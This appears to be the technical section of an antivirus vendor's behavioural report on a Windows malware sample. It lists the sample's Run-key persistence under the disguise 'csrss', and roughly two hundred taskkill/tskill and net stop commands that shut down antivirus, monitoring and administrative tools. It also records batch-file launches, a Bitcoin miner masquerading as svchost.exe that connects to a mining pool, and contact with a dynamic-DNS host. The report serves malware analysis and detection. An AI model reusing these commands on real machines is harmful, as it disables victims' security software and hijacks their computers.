Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'csrss' = 'C:\Users\Public\smxss.exe'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'csrss' = 'C:\Users\Public\smxss.exe'
- <SYSTEM32>\taskkill.exe /f /im mcvsshld.exe
- <SYSTEM32>\tskill.exe /A mcupdate
- <SYSTEM32>\taskkill.exe /f /im md.exe
- <SYSTEM32>\tskill.exe /A monitor
- <SYSTEM32>\tskill.exe /A md
- <SYSTEM32>\taskkill.exe /f /im mcmnhdlr.exe
- <SYSTEM32>\tskill.exe /A mcmnhdlr
- <SYSTEM32>\taskkill.exe /f /im mctool.exe
- <SYSTEM32>\taskkill.exe /f /im mcupdate.exe
- <SYSTEM32>\tskill.exe /A mctool
- <SYSTEM32>\tskill.exe /A nod32
- <SYSTEM32>\tskill.exe /A nprotect
- <SYSTEM32>\tskill.exe /A notstart
- <SYSTEM32>\cmd.exe /c C:\Users\Public\cpx.bat
- <SYSTEM32>\taskkill.exe /f /im clean.exe
- <SYSTEM32>\taskkill.exe /f /im f-prot.exe
- <SYSTEM32>\tskill.exe /A normist
- <SYSTEM32>\taskkill.exe /f /im nod32.exe
- <SYSTEM32>\taskkill.exe /f /im normist.exe
- <SYSTEM32>\taskkill.exe /f /im norton*.exe
- <SYSTEM32>\tskill.exe /A norton*
- <SYSTEM32>\taskkill.exe /f /im blackice.exe
- <SYSTEM32>\tskill.exe /A blackice
- <SYSTEM32>\tskill.exe /A bidef
- <SYSTEM32>\tskill.exe /A bidserver
- <SYSTEM32>\taskkill.exe /f /im bidef.exe
- <SYSTEM32>\tskill.exe /A avltmain
- <SYSTEM32>\taskkill.exe /f /im avkwctl9.exe
- <SYSTEM32>\taskkill.exe /f /im avltmain.exe
- <SYSTEM32>\taskkill.exe /f /im avwin.exe
- <SYSTEM32>\tskill.exe /A avwin
- <SYSTEM32>\taskkill.exe /f /im bidserver.exe
- <SYSTEM32>\tskill.exe /A mapisvc32
- <SYSTEM32>\taskkill.exe /f /im icmon.exe
- <SYSTEM32>\taskkill.exe /f /im mapisvc32.exe
- <SYSTEM32>\taskkill.exe /f /im mcagent.exe
- <SYSTEM32>\tskill.exe /A mcagent
- <SYSTEM32>\tskill.exe /A cleanpc
- <SYSTEM32>\tskill.exe /A clean
- <SYSTEM32>\taskkill.exe /f /im cleanpc.exe
- <SYSTEM32>\tskill.exe /A ctrl
- <SYSTEM32>\taskkill.exe /f /im click.exe
- <SYSTEM32>\tskill.exe /A cleaner
- <SYSTEM32>\tskill.exe /A espwatch
- <SYSTEM32>\taskkill.exe /f /im escanv95.exe
- <SYSTEM32>\taskkill.exe /f /im espwatch.exe
- <SYSTEM32>\taskkill.exe /f /im etrustcipe.exe
- <SYSTEM32>\tskill.exe /A etrustcipe
- <SYSTEM32>\taskkill.exe /f /im ecengine.exe
- <SYSTEM32>\tskill.exe /A ecengine
- <SYSTEM32>\tskill.exe /A escanhnt
- <SYSTEM32>\tskill.exe /A escanv95
- <SYSTEM32>\taskkill.exe /f /im escanhtn.exe
- <SYSTEM32>\tskill.exe /A f-stopw
- <SYSTEM32>\tskill.exe /A mcshield
- <SYSTEM32>\tskill.exe /A ccleaner
- <SYSTEM32>\taskkill.exe /f /im mcshield.exe
- <SYSTEM32>\taskkill.exe /f /im monitor.exe
- <SYSTEM32>\tskill.exe /A mcvsrte
- <SYSTEM32>\taskkill.exe /f /im guard
- <SYSTEM32>\taskkill.exe /f /im f-stopw.exe
- <SYSTEM32>\taskkill.exe /f /im guarddog.exe
- <SYSTEM32>\tskill.exe /A icmon
- <SYSTEM32>\tskill.exe /A guarddog
- <SYSTEM32>\tskill.exe /A wireshark
- <SYSTEM32>\taskkill.exe /f /im connectionmonitor.exe
- <SYSTEM32>\taskkill.exe /f /im wireshark.exe
- <SYSTEM32>\taskkill.exe /f /im cmgrdian.exe
- <SYSTEM32>\tskill.exe /A cmgrdian
- <SYSTEM32>\tskill.exe /A cleaner3
- <SYSTEM32>\taskkill.exe /f /im cleaner.exe
- <SYSTEM32>\taskkill.exe /f /im cleaner3.exe
- <SYSTEM32>\tskill.exe /A connectionmonitor
- <SYSTEM32>\taskkill.exe /f /im ctrl.exe
- <SYSTEM32>\tskill.exe /A cmesys
- <SYSTEM32>\tskill.exe /A ethereal
- <SYSTEM32>\taskkill.exe /f /im deputy.exe
- <SYSTEM32>\taskkill.exe /f /im ethereal.exe
- <SYSTEM32>\taskkill.exe /f /im esafe.exe
- <SYSTEM32>\tskill.exe /A esafe
- <SYSTEM32>\tskill.exe /A defwatch
- <SYSTEM32>\taskkill.exe /f /im cmesys.exe
- <SYSTEM32>\taskkill.exe /f /im defwatch.exe
- <SYSTEM32>\tskill.exe /A deputy
- <SYSTEM32>\taskkill.exe /f /im defscangui.exe
- <SYSTEM32>\taskkill.exe /f /im AAWService.exe
- <SYSTEM32>\tskill.exe /A mbam
- <SYSTEM32>\tskill.exe /A AAWService
- <SYSTEM32>\tskill.exe /A AAWTray
- <SYSTEM32>\taskkill.exe /f /im AAWTray.exe
- <SYSTEM32>\tskill.exe /A SUpdate
- <SYSTEM32>\taskkill.exe /f /im SUpdate.exe
- <SYSTEM32>\taskkill.exe /f /im Update.exe
- <SYSTEM32>\taskkill.exe /f /im mbam.exe
- <SYSTEM32>\tskill.exe /A Update
- <SYSTEM32>\net.exe stop aawservice
- <SYSTEM32>\tskill.exe /A fuckyou
- <SYSTEM32>\taskkill.exe /f /im avp.exe
- <SYSTEM32>\tskill.exe /A avp
- <SYSTEM32>\taskkill.exe /f /im MSASCui.exe
- <SYSTEM32>\tskill.exe /A MSASCui
- <SYSTEM32>\tskill.exe /A Ad-Aware
- <SYSTEM32>\taskkill.exe /f /im Ad-Aware.exe
- <SYSTEM32>\taskkill.exe /f /im threatwork.exe
- <SYSTEM32>\net1.exe stop aawservice
- <SYSTEM32>\tskill.exe /A threatwork
- <SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v csrss /d C:\Users\Public\smxss.exe /f
- <SYSTEM32>\cmd.exe /c C:\Users\Public\instmnr.bat
- <SYSTEM32>\tskill.exe /A taskmgr
- <SYSTEM32>\tskill.exe /A regedit
- <SYSTEM32>\taskkill.exe /f /im taskmgr.exe
- <SYSTEM32>\tskill.exe /A smxss
- <SYSTEM32>\cmd.exe /c C:\mkxxosrw.bat
- <SYSTEM32>\taskkill.exe /f /im smxss.exe
- <SYSTEM32>\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v csrss /d C:\Users\Public\smxss.exe /f
- <SYSTEM32>\cmd.exe /c C:\Users\Public\aiasodjfapughaw.bat
- <SYSTEM32>\taskkill.exe /f /im <Virus name>.exe
- <SYSTEM32>\tskill.exe /A TeaTimer
- <SYSTEM32>\taskkill.exe /f /im TeaTimer.exe
- <SYSTEM32>\taskkill.exe /f /im SpybotSD.exe
- <SYSTEM32>\tskill.exe /A SpybotSD
- <SYSTEM32>\taskkill.exe /f /im msconfig.exe
- <SYSTEM32>\cmd.exe /c C:\Users\Public\load.bat
- <SYSTEM32>\taskkill.exe /f /im regedit.exe
- <SYSTEM32>\tskill.exe /A msconfig
- <SYSTEM32>\tskill.exe /A <Virus name>
- <SYSTEM32>\svchost.exe -T 98 -o http://Je############uckerhead:x@mine3.btcguild.com:8332/
- <SYSTEM32>\tskill.exe /A _avp32
- <SYSTEM32>\tskill.exe /A avgserv
- <SYSTEM32>\taskkill.exe /f /im avgrsx.exe
- <SYSTEM32>\taskkill.exe /f /im avgserv.exe
- <SYSTEM32>\taskkill.exe /f /im avgserv9.exe
- <SYSTEM32>\tskill.exe /A avgserv9
- <SYSTEM32>\taskkill.exe /f /im avgemc.exe
- <SYSTEM32>\tskill.exe /A avgemc
- <SYSTEM32>\tskill.exe /A avgnt
- <SYSTEM32>\tskill.exe /A avgrsx
- <SYSTEM32>\taskkill.exe /f /im avgnt.exe
- <SYSTEM32>\tskill.exe /A avguard
- <SYSTEM32>\taskkill.exe /f /im avkserv.exe
- <SYSTEM32>\tskill.exe /A avkserv
- <SYSTEM32>\tskill.exe /A avkservice
- <SYSTEM32>\tskill.exe /A avkwctl9
- <SYSTEM32>\taskkill.exe /f /im avkservice.exe
- <SYSTEM32>\tskill.exe /A avgw
- <SYSTEM32>\taskkill.exe /f /im avguard.exe
- <SYSTEM32>\taskkill.exe /f /im avgw.exe
- <SYSTEM32>\taskkill.exe /f /im avkpop.exe
- <SYSTEM32>\tskill.exe /A avkpop
- <SYSTEM32>\tskill.exe /A agentsvr
- <SYSTEM32>\tskill.exe /A alertsvc
- <SYSTEM32>\taskkill.exe /f /im agentsvr.exe
- <SYSTEM32>\taskkill.exe /f /im amon9x.exe
- <SYSTEM32>\tskill.exe /A amon9x
- <SYSTEM32>\tskill.exe /A _avpcc
- <SYSTEM32>\taskkill.exe /f /im _avp32.exe
- <SYSTEM32>\taskkill.exe /f /im _avpcc.exe
- <SYSTEM32>\taskkill.exe /f /im _avpm
- <SYSTEM32>\tskill.exe /A _avpm
- <SYSTEM32>\tskill.exe /A autotrace
- <SYSTEM32>\tskill.exe /A avgcc32
- <SYSTEM32>\taskkill.exe /f /im ave32.exe
- <SYSTEM32>\taskkill.exe /f /im avgcc32.exe
- <SYSTEM32>\taskkill.exe /f /im avgctrl.exe
- <SYSTEM32>\tskill.exe /A avgctrl
- <SYSTEM32>\tskill.exe /A avconsol
- <SYSTEM32>\taskkill.exe /f /im autotrace.exe
- <SYSTEM32>\taskkill.exe /f /im avconsol.exe
- <SYSTEM32>\taskkill.exe /f /im fuckyou.exe
- <SYSTEM32>\tskill.exe /A ave32
- AVGCTRL.EXE
- <SYSTEM32>\drwtsn32.exe
- AVGCTRL.EXE
- MCAGENT.EXE
- nod32.exe
- AVP.COM
- AVP.EXE
- AVGCC32.EXE
- C:\Users\Public\load.bat
- C:\Users\Public\ojgasog.bat
- C:\Users\Public\ar.i
- <Auxiliary element>
- C:\Users\Public\cpx.bat
- C:\Users\Public\instlx9xz7b8x.txt
- C:\mkxxosrw.bat
- C:\Users\Public\aiasodjfapughaw.bat
- C:\Users\Public\instmnr.bat
- C:\Users\Public\smxss.exe
- %TEMP%\f64c_appcompat.txt
- %TEMP%\a30d_appcompat.txt
- C:\Users\Public\smxss.exe
- 'jb###.zapto.org':21
- 'localhost':1035
- DNS ASK jb###.zapto.org
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'Indicator' WindowName: ''
- ClassName: '' WindowName: ''